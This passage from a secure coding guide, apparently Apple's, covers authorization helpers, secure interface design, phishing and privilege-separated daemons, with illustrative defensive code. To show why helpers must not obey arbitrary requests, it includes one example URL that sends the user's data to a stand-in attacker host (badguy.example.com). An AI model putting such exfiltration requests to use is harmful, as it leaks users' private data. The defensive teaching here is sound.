2. Call the permitWithRight method to determine whether the user has the right to kill the process. The application must have previously added this right (in this example, called com.apple.processkiller.kill) to the policy database. The permitWithRight method handles the interaction with the user (such as an authentication dialog). If this method returns 0, it completed without an error and the user is considered preauthorized.
3. Obtain the authorization reference.
4. Create an external form of the authorization reference.
5. Create a data object containing the external authorization reference.
6. Pass this serialized authorization reference to the setuid tool that will kill the process (Listing 5-2 (page 71)).
Listing 5-1 Non-privileged process

    if (ownerUID == _my_uid &&
        ![[contextInfo processName] isEqualToString:@"WindowServer"] &&
        ![[contextInfo processName] isEqualToString:@"loginwindow"]) {
        [self killPid:pid withSignal:signal];                        // 1
    }
    else {
        SFAuthorization *auth = [SFAuthorization authorization];
        if (![auth permitWithRight:"com.apple.proccesskiller.kill"
                             flags:kAuthorizationFlagDefaults |
                                   kAuthorizationFlagInteractionAllowed |
                                   kAuthorizationFlagExtendRights |
                                   kAuthorizationFlagPreAuthorize])  // 2
        {
            AuthorizationRef authRef = [auth authorizationRef];      // 3
            AuthorizationExternalForm authExtForm;
            OSStatus status =
                AuthorizationMakeExternalForm(authRef, &authExtForm); // 4
            if (errAuthorizationSuccess == status) {
                NSData *authData =
                    [NSData dataWithBytes:authExtForm.bytes
                                   length:kAuthorizationExternalFormLength]; // 5
                [_agent killProcess:pid signal:signal
                           authData:authData];                       // 6
            }
        }
    }

The external tool is owned by root and has its setuid bit set so that it runs with root privileges. It imports the externalized authorization rights and checks the user’s authorization rights again. If the user has the rights, the tool kills the process and quits. The following numbered items correspond to comments in the code sample:
1. Convert the external authorization reference to an authorization reference.
2. Create an authorization item array.
3. Create an authorization rights set.
4. Call the AuthorizationCopyRights function to determine whether the user has the right to kill the process. You pass this function the authorization reference. If the credentials issued by the Security Server when it authenticated the user have not yet expired, this function can determine whether the user is authorized to kill the process without reauthentication. If the credentials have expired, the Security Server handles the authentication (for example, by displaying a password dialog).
   (You specify the expiration period for the credentials when you add the authorization right to the policy database.)
5. If the user is authorized to do so, kill the process.
6. If the user is not authorized to kill the process, log the unsuccessful attempt.
7. Release the authorization reference.

Listing 5-2 Privileged process

    AuthorizationRef authRef = NULL;
    OSStatus status = AuthorizationCreateFromExternalForm(
        (AuthorizationExternalForm *)[authData bytes], &authRef);    // 1
    if ((errAuthorizationSuccess == status) && (NULL != authRef)) {
        AuthorizationItem right = {"com.apple.proccesskiller.kill",
                                   0L, NULL, 0L};                    // 2
        AuthorizationItemSet rights = {1, &right};                   // 3
        status = AuthorizationCopyRights(authRef, &rights, NULL,
            kAuthorizationFlagDefaults |
            kAuthorizationFlagInteractionAllowed |
            kAuthorizationFlagExtendRights, NULL);                   // 4
        if (errAuthorizationSuccess == status)
            kill(pid, signal);                                       // 5
        else
            NSLog(@"Unauthorized attempt to signal process %d with %d",
                  pid, signal);                                      // 6
        AuthorizationFree(authRef, kAuthorizationFlagDefaults);      // 7
    }

Helper Tool Cautions

If you write a privileged helper tool, you need to be very careful to examine your assumptions. For example, you should always check the results of function calls; it is dangerous to assume they succeeded and to proceed on that assumption. You must be careful to avoid any of the pitfalls discussed in this document, such as buffer overflows and race conditions.

If possible, avoid linking in any extra libraries. If you do have to link in a library, you must not only be sure that the library has no security vulnerabilities, but also that it doesn’t link in any other libraries. Any dependencies on other code potentially open your code to attack.

In order to make your helper tool as secure as possible, you should make it as short as possible: have it do only the very minimum necessary and then quit.
Keeping it short makes it less likely that you made mistakes, and makes it easier for others to audit your code. Be sure to get a security review from someone who did not help write the tool originally. An independent reviewer is less likely to share your assumptions and more likely to spot vulnerabilities that you missed.

Authorization and Trust Policies

In addition to the basic permissions provided by BSD, the OS X Authorization Services API enables you to use the policy database to determine whether an entity should have access to specific features or data within your application. Authorization Services includes functions to read, add, edit, and delete policy database items.

You should define your own trust policies and put them in the policy database. If you use a policy provided by the system or by some other developer, the user might be granted authorization for a right by some other process, thus gaining privileges to your application or access to data that you did not authorize or intend. Define a different policy for each operation to avoid having to give broad permissions to users who need only narrow privileges. For more information about policies and the policy database, see the section “The Policy Database” in the “Authorization Concepts” chapter of Authorization Services Programming Guide.

Authorization Services does not enforce access controls; rather, it authenticates users and lets you know whether they have permission to carry out the action they wish to perform. It is up to your program to either deny the action or carry it out.

Security in a KEXT

Because kernel extensions have no user interface, you cannot call Authorization Services to obtain permissions that you do not already have. However, in portions of your code that handle requests from user space, you can determine what permissions the calling process has, and you can evaluate access control lists (ACLs; see the section “ACLs” in the “Security Concepts” section of Security Overview).
In OS X v10.4 and later, you can also use the Kernel Authorization (Kauth) subsystem to manage authorization. For more information on Kauth, see Technical Note TN2127, Kernel Authorization (http://developer.apple.com/technotes/tn2005/tn2127.html).

Designing Secure User Interfaces

The user is often the weak link in the security of a system. Many security breaches have been caused by weak passwords, unencrypted files left on unprotected computers, and successful social engineering attacks. Therefore, it is vitally important that your program’s user interface enhance security by making it easy for the user to make secure choices and avoid costly mistakes.

In a social engineering attack, the user is tricked into either divulging secret information or running malicious code. For example, the Melissa virus and the Love Letter worm each infected thousands of computers when users downloaded and opened files sent in email.

This chapter discusses how doing things that are contrary to user expectations can cause a security risk, and gives hints for creating a user interface that minimizes the risk from social engineering attacks. Secure human interface design is a complex topic affecting operating systems as well as individual programs. This chapter gives only a few hints and highlights.

For an extensive discussion of this topic, see Cranor and Garfinkel, Security and Usability: Designing Secure Systems that People Can Use, O’Reilly, 2005. There is also an interesting weblog on this subject maintained by researchers at the University of California at Berkeley (http://usablesecurity.com/).

Use Secure Defaults

Most users use an application’s default settings and assume that they are secure. If they have to make specific choices and take multiple actions in order to make a program secure, few will do so. Therefore, the default settings for your program should be as secure as possible.
For example:
● If your program launches other programs, it should launch them with the minimum privileges they need to run.
● If your program supports optionally connecting by SSL, the checkbox should be checked by default.
● If your program displays a user interface that requires the user to decide whether to perform a potentially dangerous action, the default option should be the safe choice. If there is no safe choice, there should be no default. (See “UI Element Guidelines: Controls” in OS X Human Interface Guidelines.)
The same principle applies to any other setting that affects security.

There is a common belief that security and convenience are incompatible. With careful design, this does not have to be so. In fact, it is very important that the user not have to sacrifice convenience for security, because many users will choose convenience in that situation. In many cases, a simpler interface is more secure, because the user is less likely to ignore security features and less likely to make mistakes.

Whenever possible, you should make security decisions for your users: in most cases, you know more about security than they do, and if you can’t evaluate the evidence to determine which choice is most secure, the chances are your users will not be able to do so either.

For a detailed discussion of this issue and a case study, see the article “Firefox and the Worry-Free Web” in Cranor and Garfinkel, Security and Usability: Designing Secure Systems that People Can Use.

Meet Users’ Expectations for Security

If your program handles data that the user expects to be kept secret, make sure that you protect that data at all times. That means not only keeping it in a secure location or encrypting it on the user’s computer, but not handing it off to another program unless you can verify that the other program will protect the data, and not transmitting it over an insecure network.
If for some reason you cannot keep the data secure, you should make this situation obvious to users and give them the option of canceling the insecure operation.

Important: The absence of an indication that an operation is secure is not a good way to inform the user that the operation is insecure. A common example of this is any web browser that adds a lock icon (usually small and inconspicuous) on web pages that are protected by SSL/TLS or some similar protocol. The user has to notice that this icon is not present (or that it’s in the wrong place, in the case of a spoofed web page) in order to take action. Instead, the program should prominently display some indication for each web page or operation that is not secure.

The user must be made aware of when they are granting authorization to some entity to act on their behalf or to gain access to their files or data. For example, a program might allow users to share files with other users on remote systems in order to allow collaboration. In this case, sharing should be off by default. If the user turns it on, the interface should make clear the extent to which remote users can read from and write to files on the local system. If turning on sharing for one file also lets remote users read any other file in the same folder, for example, the interface must make this clear before sharing is turned on. In addition, as long as sharing is on, there should be some clear indication that it is on, lest users forget that their files are accessible by others.

Authorization should be revocable: if a user grants authorization to someone, the user generally expects to be able to revoke that authorization later. Whenever possible, your program should not only make this possible, it should make it easy to do.
If for some reason it will not be possible to revoke the authorization, you should make that clear before granting the authorization. You should also make it clear that revoking authorization cannot reverse damage already done (unless your program provides a restore capability).

Similarly, any other operation that affects security but that cannot be undone should either not be allowed or the user should be made aware of the situation before they act. For example, if all files are backed up in a central database and can’t be deleted by the user, the user should be aware of that fact before they record information that they might want to delete later.

As the user’s agent, you must carefully avoid performing operations that the user does not expect or intend. For example, avoid automatically running code if it performs functions that the user has not explicitly authorized.

Secure All Interfaces

Some programs have multiple user interfaces, such as a graphical user interface, a command-line interface, and an interface for remote access. If any of these interfaces require authentication (such as with a password), then all the interfaces should require it.

Furthermore, if you require authentication through a command line or remote interface, be sure the authentication mechanism is secure; don’t transmit passwords in cleartext, for example.

Place Files in Secure Locations

Unless you are encrypting all output, the location where you save files has important security implications. For example:
● FileVault can secure the root volume (or the user’s home folder prior to OS X v10.7), but not other locations where the user might choose to place files.
● Folder permissions can be set in such a way that others can manipulate their contents.

You should restrict the locations where users can save files if they contain information that must be protected.
If you allow the user to select the location to save files, you should make the security implications of a particular choice clear; specifically, they must understand that, depending on the location of a file, it might be accessible to other applications or even remote users.

Make Security Choices Clear

Most programs, upon detecting a problem or discrepancy, display a dialog box informing the user of the problem. Often this approach does not work, however. For one thing, the user might not understand the warning or its implications. For example, if the dialog warns the user that the site to which they are connecting has a certificate whose name does not match the name of the site, the user is unlikely to know what to do with that information, and is likely to ignore it. Furthermore, if the program puts up more than a few dialog boxes, the user is likely to ignore all of them.

To solve this problem, when giving the user a choice that has security implications, make the potential consequences of each choice clear. The user should never be surprised by the results of an action. The choice given to the user should be expressed in terms of consequences and trade-offs, not technical details.

For example, a choice of encryption methods should be based on the level of security (expressed in simple terms, such as the amount of time it might take to break the encryption) versus the time and disk space required to encrypt the data, rather than on the type of algorithm and the length of the key to be used. If there are no practical differences of importance to the user (as when the more secure encryption method is just as efficient as the less-secure method), just use the most secure method and don’t give the user the choice at all.

Be sensitive to the fact that few users are security experts.
Give as much information (in clear, nontechnical terms) as necessary for them to make an informed decision. In some cases, it might be best not to give them the option of changing the default behavior.

For example, most users don’t know what a digital certificate is, let alone the implications of accepting a certificate signed by an unknown authority. Therefore, it is probably not a good idea to let the user permanently add an anchor certificate (a certificate that is trusted for signing other certificates) unless you can be confident that the user can evaluate the validity of the certificate. (Further, if the user is a security expert, they’ll know how to add an anchor certificate to the keychain without the help of your application anyway.)

If you are providing security features, you should make their presence clear to the user. For example, if your mail application requires the user to double click a small icon in order to see the certificate used to sign a message, most users will never realize that the feature is available.

In an often-quoted but rarely applied monograph, Jerome Saltzer and Michael Schroeder wrote “It is essential that the human interface be designed for ease of use, so that users routinely and automatically apply the protection mechanisms correctly. Also, to the extent that the user’s mental image of his protection goals matches the mechanisms he must use, mistakes will be minimized. If he must translate his image of his protection needs into a radically different specification language, he will make errors.” (Saltzer and Schroeder, “The Protection of Information in Computer Systems,” Proceedings of the IEEE 63:9, 1975.)
For example, you can assume the user understands that the data must be protected from unauthorized access; however, you cannot assume the user has any knowledge of encryption schemes or knows how to evaluate password strength. In this case, your program should present the user with choices like the following:
● “Is your computer physically secure, or is it possible that an unauthorized user will have physical access to the computer?”
● “Is your computer connected to a network?”

From the user’s answers, you can determine how best to protect the data. Unless you are providing an “expert” mode, do not ask the user questions like the following:
● “Do you want to encrypt your data, and if so, with which encryption scheme?”
● “How long a key should be used?”
● “Do you want to permit SSH access to your computer?”

These questions don’t correspond with the user’s view of the problem. Therefore, the user’s answers to such questions are likely to be erroneous. In this regard, it is very important to understand the user’s perspective. Very rarely is an interface that seems simple or intuitive to a programmer actually simple or intuitive to average users.

To quote Ka-Ping Yee (User Interaction Design for Secure Systems, at http://www.eecs.berkeley.edu/Pubs/TechRpts/2002/CSD-02-1184.pdf):

In order to have a chance of using a system safely in a world of unreliable and sometimes adversarial software, a user needs to have confidence in all of the following statements:
● Things don’t become unsafe all by themselves. (Explicit Authorization)
● I can know whether things are safe. (Visibility)
● I can make things safer. (Revocability)
● I don’t choose to make things unsafe. (Path of Least Resistance)
● I know what I can do within the system. (Expected Ability)
● I can distinguish the things that matter to me. (Appropriate Boundaries)
● I can tell the system what I want. (Expressiveness)
● I know what I’m telling the system to do. (Clarity)
● The system protects me from being fooled.
  (Identifiability, Trusted Path)

For additional tips, read “Dialogs” in OS X Human Interface Guidelines and “Alerts, Action Sheets, and Modal Views” in iOS Human Interface Guidelines.

Fight Social Engineering Attacks

Social engineering attacks are particularly difficult to fight. In a social engineering attack, the attacker fools the user into executing attack code or giving up private information.

A common form of social engineering attack is referred to as phishing. Phishing refers to the creation of an official-looking email or web page that fools the user into thinking they are dealing with an entity with which they are familiar, such as a bank with which they have an account. Typically, the user receives an email informing them that there is something wrong with their account, and instructing them to click on a link in the email. The link takes them to a web page that spoofs a real one; that is, it includes icons, wording, and graphical elements that echo those the user is used to seeing on a legitimate web page. The user is instructed to enter such information as their social security number and password. Having done so, the user has given up enough information to allow the attacker to access the user’s account.

Fighting phishing and other social engineering attacks is difficult because the computer’s perception of an email or web page is fundamentally different from that of the user. For example, consider an email containing a link to http://scamsite.example.com/ but in which the link’s text says Apple Web Store. From the computer’s perspective, the URL links to a scam site, but from the user’s perspective, it links to Apple’s online store. The user cannot easily tell that the link does not lead to the location they expect until they see the URL in their browser; the computer similarly cannot determine that the link’s text is misleading.
To further complicate matters, even when the user looks at the actual URL, the computer and user may perceive the URL differently. The Unicode character set includes many characters that look similar or identical to common English letters. For example, the Russian glyph that is pronounced like “r” looks exactly like an English “p” in many fonts, though it has a different Unicode value. These characters are referred to as homographs. When web browsers began to support internationalized domain names (IDN), some phishers set up websites that looked identical to legitimate ones, using homographs in their web addresses to fool users into thinking the URL was correct.

Some creative techniques have been tried for fighting social engineering attacks, including trying to recognize URLs that are similar to, but not the same as, well-known URLs, using private email channels for communications with customers, using email signing, and allowing users to see messages only if they come from known, trusted sources. All of these techniques have problems, and the sophistication of social engineering attacks is increasing all the time.

For example, to foil the domain name homograph attack, many browsers display internationalized domain names (IDN) in an ASCII format called “Punycode.” For example, an impostor website with the URL http://www.apple.com/ that uses a Roman script for all the characters except for the letter “a”, for which it uses a Cyrillic character, is displayed as http://www.xn--pple-43d.com.

Different browsers use different schemes when deciding which internationalized domain names to show and which ones to translate. For example, Safari uses this form when a URL contains characters in two or more scripts that are not allowed in the same URL, such as Cyrillic characters and traditional ASCII characters.
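A simplified version of such a mixed-script check can be sketched in C. This is not Safari's actual algorithm: it only looks for ASCII letters combined with code points in the basic Cyrillic block (U+0400 through U+04FF) in a UTF-8 host name, and the function name mixes_latin_and_cyrillic is hypothetical.

```c
#include <stddef.h>

/* Hypothetical check: returns 1 if the UTF-8 string s contains both
 * ASCII letters and basic Cyrillic code points, 0 otherwise. */
int mixes_latin_and_cyrillic(const char *s)
{
    const unsigned char *p = (const unsigned char *)s;
    int has_latin = 0;
    int has_cyrillic = 0;

    while (*p != 0) {
        unsigned long cp;

        if (*p < 0x80) {
            /* One-byte sequence: plain ASCII. */
            cp = *p;
            p += 1;
        } else if ((*p & 0xE0) == 0xC0 && (p[1] & 0xC0) == 0x80) {
            /* Two-byte sequence: covers U+0080 through U+07FF,
             * which includes the basic Cyrillic block. */
            cp = ((unsigned long)(*p & 0x1F) << 6) | (p[1] & 0x3F);
            p += 2;
        } else {
            /* Longer or malformed sequence: skip the lead byte and
             * any continuation bytes without classifying it. */
            p += 1;
            while ((*p & 0xC0) == 0x80) {
                p += 1;
            }
            continue;
        }

        if ((cp >= 'a' && cp <= 'z') || (cp >= 'A' && cp <= 'Z')) {
            has_latin = 1;
        } else if (cp >= 0x0400 && cp <= 0x04FF) {
            has_cyrillic = 1;
        }
    }
    return has_latin && has_cyrillic;
}
```

A client that displays host names might fall back to the Punycode form whenever a check of this kind reports a mix of scripts.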
Other browsers consider whether the character set is appropriate for the user’s default language. Still others maintain a whitelist of registries that actively prevent such spoofing and use Punycode for domains from all other registries.

For a more in-depth analysis of the problem, more suggested approaches to fighting it, and some case studies, see Security and Usability: Designing Secure Systems that People Can Use by Cranor and Garfinkel.

To learn more about social engineering techniques in general, read The Art of Deception: Controlling the Human Element of Security by Mitnick, Simon, and Wozniak.

Use Security APIs When Possible

One way to avoid adding security vulnerabilities to your code is to use the available security APIs whenever possible. The Security Interface Framework API provides a number of user interface views to support commonly performed security tasks.

iOS Note: The Security Interface Framework is not available in iOS. In iOS, applications are restricted in their use of the keychain, and it is not necessary for the user to create a new keychain or change keychain settings.

The Security Interface Framework API provides the following views:
● The SFAuthorizationView class implements an authorization view in a window. An authorization view is a lock icon and accompanying text that indicates whether an operation can be performed. When the user clicks a closed lock icon, an authorization dialog displays. Once the user is authorized, the lock icon appears open. When the user clicks the open lock, Authorization Services restricts access again and changes the icon to the closed state.
● The SFCertificateView and SFCertificatePanel classes display the contents of a certificate.
● The SFCertificateTrustPanel class displays and optionally lets the user edit the trust settings in a certificate.
● The SFChooseIdentityPanel class displays a list of identities in the system and lets the user select one.
(In this context, identity refers to the combination of a private key and its associated certificate.)
● The SFKeychainSavePanel class adds an interface to an application that lets the user save a new keychain. The user interface is nearly identical to that used for saving a file. The difference is that this class returns a keychain in addition to a filename and lets the user specify a password for the keychain.
● The SFKeychainSettingsPanel class displays an interface that lets the user change keychain settings.

Documentation for the Security Interface framework is in Security Interface Framework Reference.

Designing Secure Helpers and Daemons

Privilege separation is a common technique for making applications more secure. By breaking up an application into functional units that each require fewer privileges, you can make it harder to do anything useful with any single part of that application if someone successfully compromises it.

However, without proper design, a privilege-separated app is not significantly more secure than a non-privilege-separated app. For proper security, each part of the app must treat other parts of the app as untrusted and potentially hostile. To that end, this chapter provides dos and don’ts for designing a helper app.

There are two different ways that you can perform privilege separation:
● Creating a pure computation helper to isolate risky operations. This technique requires the main application to be inherently suspicious of any data that the helper returns, but does not require that the helper be suspicious of the application.
● Creating a helper or daemon to perform tasks without granting the application the right to perform them.
This requires not only that the main application not trust the helper, but also that the helper not trust the main application.

The techniques used for securing the two types of helpers differ only in the level of paranoia required by the helper.

Avoid Puppeteering

When a helper application is so tightly controlled by the main application that it does not make any decisions by itself, this is called puppeteering. This is inherently bad design because if the application gets compromised, the attacker can then control the helper similarly, in effect taking over pulling the helper’s “strings”. This completely destroys the privilege separation boundary. Therefore, unless you are creating a pure computation helper, splitting code into a helper application that simply does whatever the main app tells it to do is usually not a useful division of labor.

In general, a helper must be responsible for deciding whether or not to perform a particular action. If you look at the actions that an application can perform with and without privilege separation, those lists should be different; if they are not, then you are not gaining anything by separating the functionality out into a separate helper.

For example, consider a helper that downloads help content for a word processor. If the helper fetches any arbitrary URL that the word processor sends it, the helper can be trivially exploited to send arbitrary data to an arbitrary server. For example, an attacker who took control of the word processor could tell the helper to access the URL http://badguy.example.com/saveData?hereIsAnEncodedCopyOfTheUser%27sData.

The subsections that follow describe solutions for this problem.

Use Whitelists

One way to fix this is with whitelists. The helper should include a specific list of resources that it can access. For example, this helper could include:
● A host whitelist that includes only the domain example.org.
Requests to URLs in that domain would succeed, but the attacker could not cause the helper to access URLs in a different domain.
● An allowed path prefix whitelist. The attacker would not be able to use cross-site scripting on the example.org bulletin board to redirect the request to another location. (This applies mainly to apps using a web UI.) You can also avoid this by handling redirection manually.
● An allowed file type whitelist. This could limit the helper to the expected types of files. (Note that file type whitelists are more interesting for helpers that access files on the local hard drive.)
● A whitelist of specific URIs to which GET or POST operations are allowed.

Use Abstract Identifiers and Structures

A second way to avoid puppeteering is by abstracting away the details of the request itself, using data structures and abstract identifiers instead of providing URIs, queries, and paths.

A trivial example of this is a help system. Instead of the app passing a fully-formed URI for a help search request, it might pass a flag field whose value tells the helper to “search by name” or “search by title” and a string value containing the search string. This flag field is an example of an abstract identifier; it tells the helper what to do without telling it how to do it.

Taken one step further, when the helper returns a list of search results, instead of returning the names and URIs for the result pages, it could return the names and an opaque identifier (which may be an index into the last set of search results). By doing so, the application cannot access arbitrary URIs because it never interacts with the actual URIs directly.

Similarly, if you have an application that works with project files that reference other files, in the absence of an API to directly support this, you can use a temporary exception to give a helper access to all files on the disk.
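The help-search example above, combined with a host and path-prefix whitelist, might be sketched as follows. This is only an illustration under stated assumptions: the https scheme, the /help/ prefix, the query parameter name q, the 200-character limit, and all function and class names are hypothetical; only the host example.org and the two search modes come from the text.

```python
from urllib.parse import urlencode, urlsplit

# Hypothetical values for illustration; the text only names example.org.
ALLOWED_HOST = "example.org"
ALLOWED_PATH_PREFIX = "/help/"
SEARCH_MODES = {"name": "search_by_name", "title": "search_by_title"}


def build_search_url(mode, query):
    """Helper side: turn an abstract request into a URL the helper chose."""
    if mode not in SEARCH_MODES:
        raise ValueError("unknown search mode")
    if not isinstance(query, str) or len(query) > 200:
        raise ValueError("bad query")
    return ("https://" + ALLOWED_HOST + ALLOWED_PATH_PREFIX
            + SEARCH_MODES[mode] + "?" + urlencode({"q": query}))


def is_allowed(url):
    """Host and path-prefix whitelist, e.g. checked before following a redirect."""
    parts = urlsplit(url)
    return (parts.scheme == "https"
            and parts.hostname == ALLOWED_HOST
            and parts.path.startswith(ALLOWED_PATH_PREFIX)
            and ".." not in parts.path.split("/"))


class ResultTable:
    """Maps opaque identifiers to URLs so the app never handles URLs itself."""

    def __init__(self, urls):
        # Results outside the whitelist are silently discarded.
        self._urls = [u for u in urls if is_allowed(u)]

    def identifiers(self):
        return list(range(len(self._urls)))

    def resolve(self, ident):
        if not isinstance(ident, int) or not 0 <= ident < len(self._urls):
            raise KeyError("unknown identifier")
        return self._urls[ident]
```

In this arrangement the application only ever sends a mode, a search string, or an index from identifiers(), so a compromised application has no way to name the badguy.example.com URL from the earlier example.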
To make such broad file access more secure, the helper should provide access only to files that actually appear in the user-opened project. The helper might do this by requiring the application to request files by some arbitrary identifier generated by the helper rather than by name or path. This makes it harder for the application to ask the helper to open arbitrary files. This can further be augmented with sniffing, as described in “Use the Smell Test” (page 83).

The same concept can be extended to other areas. For example, if the application needs to change a record in a database, the helper could send the record as a data structure, and the app could send back the altered data structure along with an indication of which values need to change. The helper could then verify the correctness of the unaltered data before modifying the remaining data.

Passing the data abstractly also allows the helper to limit the application’s access to other database tables. It also allows the helper to limit what kinds of queries the application can perform in ways that are more fine-grained than would be possible with the permissions system that most databases provide.

Use the Smell Test

If a helper application has access to files that the main application cannot access directly, and if the main application asks the helper to retrieve the contents of that file, it is useful for the helper to perform tests on the file before sending the data to ensure that the main application has not substituted a symbolic link to a different file.

In particular, it is useful to compare the file extension with the actual contents of the file to see whether the bytes on disk make sense for the apparent file type. This technique is called file type sniffing.

For example, the first few bytes of any image file usually provide enough information to determine the file type.
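A minimal sketch of such a smell test follows. The signature table, the function name passes_smell_test, and the policy of rejecting unknown extensions are assumptions made for illustration; JPEG is matched here on its FF D8 FF start-of-image bytes, GIF on its version string, and TIFF on its two byte-order markers. Opening the file with O_NOFOLLOW (where the platform provides it) makes the open fail if the final path component is a symbolic link.

```python
import os

# Leading bytes ("magic numbers") for a few image formats.
SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".tif": (b"MM\x00*", b"II*\x00"),
    ".tiff": (b"MM\x00*", b"II*\x00"),
}


def passes_smell_test(path):
    """Return True if the file's first bytes match its extension."""
    extension = os.path.splitext(path)[1].lower()
    expected = SIGNATURES.get(extension)
    if expected is None:
        return False  # unknown type: refuse rather than guess
    # O_NOFOLLOW rejects a symbolic link in the final path component.
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags)
    except OSError:
        return False
    with os.fdopen(fd, "rb") as f:
        header = f.read(8)
    return header.startswith(expected)
```

A check like this only raises the bar; a file that passes can still be malformed further in, so the data should continue to be treated as untrusted input.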
If the file begins with the bytes FF D8 FF (in JFIF files, the string JFIF follows at byte offset 6), the file is probably a JPEG image file. If the first four bytes are GIF8, the file is probably a GIF image file. If the first four bytes are MM\0* or II*\0 (where \0 is a zero byte), the file is probably a TIFF file. And so on.

If the request passes this smell test, then the odds are good that the request is not malicious.

Treat Both App and Helper as Hostile

Because the entire purpose of privilege separation is to prevent an attacker from being able to do anything useful after compromising one part of an application, both the helper and the app must assume that the other party is potentially hostile. This means each piece must:
● Avoid buffer overflows (“Avoiding Buffer Overflows And Underflows” (page 17)).
● Validate all input from the other side (“Validating Input And Interprocess Communication” (page 33)).
● Avoid insecure interprocess communication mechanisms (“Validating Input And Interprocess Communication” (page 33)).
● Avoid race conditions (“Avoiding Race Conditions” (page 43)).
● Treat the contents of any directory or file to which the other process has write access as fundamentally untrusted (“Securing File Operations” (page 47)). This list potentially includes:
  ● The entire app container directory.
  ● Preference files.
  ● Temporary files.
  ● User files.
  And so on.

If you follow these design principles, you will make it harder for an attacker to do anything useful if he or she compromises your app.

Run Daemons as Unique Users

For daemons that start with elevated privileges and then drop privileges, you should always use a locally unique user ID for your program. If you use some standard UID such as _unknown or nobody, then any other process running with that same UID can interact with your program, either directly through interprocess communication, or indirectly by altering configuration files.
Thus, if someone hijacks another daemon on the same server, they can then interfere with your daemon; or, conversely, if someone hijacks your daemon, they can use it to interfere with other daemons on the server.

You can use Open Directory services to obtain a locally unique UID. Note that UIDs from 0 through 500 are reserved for use by the system.

Note: You should generally avoid making security decisions based on the user’s ID or name for two reasons:
● Many APIs for determining the user ID and user name are inherently untrustworthy because they return the value of the USER environment variable.
● Someone could trivially make a copy of your app and change the string to a different value, then run the app.

Start Other Processes Safely

When it comes to security, not all APIs for running external tools are created equal. In particular:

Avoid the POSIX system(3) function. Its simplicity makes it a tempting choice, but also makes it much more dangerous than other functions. When you use system, you become responsible for completely sanitizing the entire command, which means protecting any characters that are treated as special by the shell. You are responsible for understanding and correctly using the shell’s quoting rules, knowing which characters are interpreted within each type of quotation marks, and so on. This is no small feat even for expert shell script programmers, and is strongly inadvisable for everyone else. Bluntly put, you will get it wrong.

Set up your own environment correctly ahead of time. Many APIs search for the tool you want to run in locations specified by the PATH environment variable. If an attacker can modify that variable, the attacker can potentially trick your app into starting a different tool and running it as the current user.
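As a rough sketch of the advice in this section, the following Python fragment starts a tool by absolute path, passes its arguments as a list so that no shell is involved, and supplies a fixed environment instead of the inherited one. Python's subprocess module stands in here for the exec(3) family; the function name list_directory, the choice of /bin/ls, and the SAFE_ENV values are assumptions made for illustration.

```python
import subprocess

# A fixed, minimal environment instead of whatever the parent inherited.
SAFE_ENV = {"PATH": "/usr/bin:/bin", "LANG": "C"}


def list_directory(untrusted_name):
    """Run /bin/ls on a caller-supplied name without involving a shell."""
    result = subprocess.run(
        # Absolute path to the tool; "--" ends option parsing so the
        # untrusted value cannot be read as a flag.
        ["/bin/ls", "-d", "--", untrusted_name],
        env=SAFE_ENV,
        shell=False,          # no shell, so no quoting rules to get wrong
        capture_output=True,
        text=True,
        check=False,
    )
    return result.stdout


print(list_directory("/"))
# Shell metacharacters are just part of a (nonexistent) file name here.
print(repr(list_directory("/; echo injected")))
```

Because the untrusted value travels as a single argv entry, there is nothing to escape; the same string handed to system(3) would have run a second command.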
You can avoid this PATH substitution problem by either explicitly setting the PATH environment variable yourself or by avoiding variants of exec(3) or posix_spawn(2) that use the PATH environment variable to search for executables.

Use absolute paths where possible, or relative paths if absolute paths are not available. When you explicitly specify a path to an executable rather than just its name, the PATH environment variable is not consulted when the OS determines which tool to run.

For more information about environment variables and shell special characters, read Shell Scripting Primer.

Security Development Checklists

This appendix presents a set of security audit checklists that you can use to help reduce the security vulnerabilities of your software. These checklists are designed to be used during software development. If you read this section all the way through before you start coding, you may avoid many security pitfalls that are difficult to correct in a completed program.

Note that these checklists are not exhaustive; you might not have any of the potential vulnerabilities discussed here and still have insecure code. Also, as the author of the code, you are probably too close to the code to be fully objective, and thus may overlook certain flaws. For this reason, it’s very important that you have your code reviewed for security problems by an independent reviewer. A security expert would be best, but any competent programmer, if aware of what to look for, might find problems that you may have missed. In addition, whenever the code is updated or changed in any way, including to fix bugs, it should be checked again for security problems.

Important: All code should have a security audit before being released.

Use of Privilege

This checklist is intended to determine whether your code ever runs with elevated privileges, and if it does, how best to do so safely.
Note that it’s best to avoid running with elevated privileges if possible; see “Avoiding Elevated Privileges” (page 63).

1. Reduce privileges whenever possible.
If you are using privilege separation with sandboxing or other privilege-limiting techniques, you should be careful to ensure that your helper tools are designed to limit the damage that they can cause if the main application gets compromised, and vice-versa. Read “Designing Secure Helpers And Daemons” (page 81) to learn how.
Also, for daemons that start with elevated privileges and then drop privileges, you should always use a locally unique user ID for your program. See “Run Daemons As Unique Users” (page 84) to learn more.

2. Use elevated privileges sparingly, and only in privileged helpers.
In most cases, a program can get by without elevated privileges, but sometimes a program needs elevated privileges to perform a limited number of operations, such as writing files to a privileged directory or opening a privileged port.
If an attacker finds a vulnerability that allows execution of arbitrary code, the attacker’s code runs with the same privilege as the running code, and can take complete control of the computer if that code has root privileges. Because of this risk, you should avoid elevating privileges if at all possible.
If you must run code with elevated privileges, here are some rules:
● Never run your main process as a different user. Instead, create a separate helper tool that runs with elevated privileges.
● Your helper tool should do as little as possible.
● Your helper tool should restrict what you can ask it to do as much as possible.
● Your helper tool should either drop the elevated privileges or stop executing as soon as possible.
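The last rule, dropping elevated privileges as soon as possible, is easy to get subtly wrong, so a hedged sketch may help. It assumes a POSIX system and a helper that was started as root; the function name drop_privileges and the os_api parameter (which exists only so the call order can be exercised without actually being root) are hypothetical, and the target uid and gid are whatever locally unique values the caller obtained elsewhere.

```python
import os


def drop_privileges(uid, gid, os_api=os):
    """Permanently switch from root to an unprivileged uid and gid.

    os_api defaults to the real os module; it is a parameter only so the
    sequence of calls can be checked without running as root.
    """
    if os_api.geteuid() != 0:
        return  # not running as root, nothing to drop
    os_api.setgroups([])  # shed supplementary groups first
    os_api.setgid(gid)    # group before user: after setuid this would fail
    os_api.setuid(uid)
    # Verify that the drop is irreversible: regaining root must fail.
    try:
        os_api.setuid(0)
    except OSError:
        return
    raise RuntimeError("privileges were not dropped")
```

The order matters: once the user ID has been changed, the process no longer has the right to change its groups, so the group changes come first and the final check confirms that root cannot be regained.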
